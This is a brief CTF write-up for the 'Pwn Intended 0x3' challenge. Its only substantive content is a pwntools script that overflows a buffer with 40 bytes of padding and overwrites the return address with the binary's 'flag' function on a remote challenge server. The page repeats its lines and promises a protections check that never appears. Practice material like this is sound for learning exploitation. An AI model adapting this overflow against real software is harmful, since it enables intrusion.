Pwn Intended 0x3
Again, smashing the keyboard doesn't work. Sadly. Let's check out the protections:
Last updated
Was this helpful?
Again, smashing the keyboard doesn't work. Sadly. Let's check out the protections:
Last updated
Was this helpful?
Was this helpful?
from pwn import *
elf = ELF('./vuln')
p = remote('chall.csivit.com', 30013)
payload = b'A' * 40
payload += p64(elf.symbols['flag'])
p.clean()
p.sendline(payload)
print(p.clean(2).decode())